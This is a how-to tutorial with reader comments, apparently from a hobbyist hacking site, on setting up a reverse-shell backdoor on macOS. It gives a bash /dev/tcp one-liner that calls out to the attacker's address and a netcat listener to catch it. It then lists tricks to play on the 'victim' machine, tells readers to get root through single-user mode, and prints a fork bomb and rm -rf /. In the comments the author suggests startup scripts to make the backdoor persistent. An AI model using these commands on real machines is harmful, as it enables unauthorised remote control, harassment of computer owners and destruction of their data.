How To: Create Backdoor on OSX

Create Backdoor on OSX

Hello, ladies and gents! Today I will be discussing the fun and excitement of backdoor on an OSX system.

Note: A lot of what I am going to say is directly based off of this article by Patrick Mosca. Please give him your gratitude and leave mine at the door!

Step 1: Reverse Shell

A reverse shell is the first step to our backdoor on the OSX system.
The reverse shell will make it so our target computer tries to connect to us, before we connect to them.

We can create reverse shells with a simple 1 line code on our target system. (Yes sadly this has to be done on the target system.)

bash -i >& /dev/tcp/youripaddress/1337 0>&1

Fantastic! Your reverse shell has been created. If we want to gain root access, we can use our swiss army knife of penetrating testing tools, netcat.

On Kali Linux, type:
nc -l -p 1337

If you are using an OSX system for penetration testing (for some reason), type this:
nc -l 1337

If you did everything correctly, you should see a command line prompt similar to the following:

bash-3.2$

Step 2: Test Your Door

Let's make sure our backdoor has working hinges and a working doorknob. Don't think to hard about what I just said that was a joke.

Here are some fun things you can do with your backdoor:

1. Make the victim computer talk.

This is probably the most easy and funny trick in the book. Just type:
"say (Whatever you want the computer to say)"

If the volume is turned down on the victim computer, no words will be heard. To fix this, turn the volume all the way up!

" osascript -e 'set volume 7' "

2. Open links.

That's right. Remember that fantasy you had where you were a top notch hacker and you opened a thousand links of nyan cat on a government computer?

Well, you can do the same thing here, but instead of a government computer it would be a computer that you have permission to execute attacks on. (You evil little thing).

Simply type:
"open (link)"

Note: Your link MUST start with http://www . for this to work.

3. Navigate to directories

This one is probably going to be the most useful to know.

"ls" lists all of the files and folders contained in a directory.
"cd" opens a folder or directory.

4. Deadly commands

I will here talk briefly about some seriously, "do not try at home", commands.

I am not responsible for anything idiotic you do.

Note: Some if not most of these commands require root permissions. If you would like to be rooted backdoor accessible, than run this reverse shell command in single user mode. To launch in single user mode, start the victim computer whilst holding command s.

Fork Bomb:

A fork bomb is a process that will reduplicate itself infinitely until the computer crashes.

A fork bomb is made by typing:
:(){ :|:& };:

Note: I am not sure that this works on mac. Don't test it out, though. Seriously.

Erase EVERYTHING:

Okay no explanation needed:
rm -rf /

Step 3: Conclusion

Everyone run! The cyber revolution has taken over! Destroy the computers!

Just kidding.

The one main flaw in this attack is the fact that the target system has to execute a command first. So, there is a simple "patch".

  1. Don't give your computer to strangers
  2. Don't leave your computer out in the open
  3. Don't run commands that you don't understand

I hope you enjoyed this tutorial! As always, leave any questions or disagreements in the comment section!
-- Cameron

16 Comments

Hey! Thank you for your great tutorial! Is it possible to make that script working on every computer start? Thank you

How to make wan plz?

How can I make this persistent?

There are ways to make this persistent. Think about adding a script or process that will automatically run this command whenever the computer is turned on.

Hey thanks for the awesome guide! I have a quick question, in the cmd:

bash -i >&/dev/tcp/youripadress/1337 0>&1

I don't use my mac adress right? And do I need a wireless adapter to create and use a backdoor like this?

Sorry if these are stupid questions, I'm a beginner.

Thanks for leaving a comment. You do not use your mac address, but your IP address instead. Also, you do not need any external wireless card to do this.

I keep getting an error in the OSX terminal saying:

-bash: connect: Operation timed out
-bash: /dev/tcp/00.00.000.00/1337: Operation timed out

(I edited out my IP for the purpose of posting the cmd line here)

I'm not sure what I'm doing wrong.

Hey great tutorial. Can you explain how that command works though? The bash -i one. I got it to work but I want to understand it.

When I tried bash -i >& /dev/tcp/youripaddress/1337 0>&1 on my mac I got a connection refused response.

I went into my airport and allowed access to the 1337 port.

Now when I run bash -i >& /dev/tcp/youripaddress/1337 0>&1 I get a Network is unreachable response.

My public ip:address is the same for all devices on my network

Hello, same here when trying from host OSX to kali guest vm.
Anyway if I try with the address of another (windows) pc on the network it seems to work.

Is that related to the network interface?

Thanks

I like your tutorials like my mom but, can you do this command on windows? thanks

How can I remove the backdoor? I want to try it out on my other Macbook but first I want to know how you remove it. Thank you.

Share Your Thoughts

  • Hot
  • Latest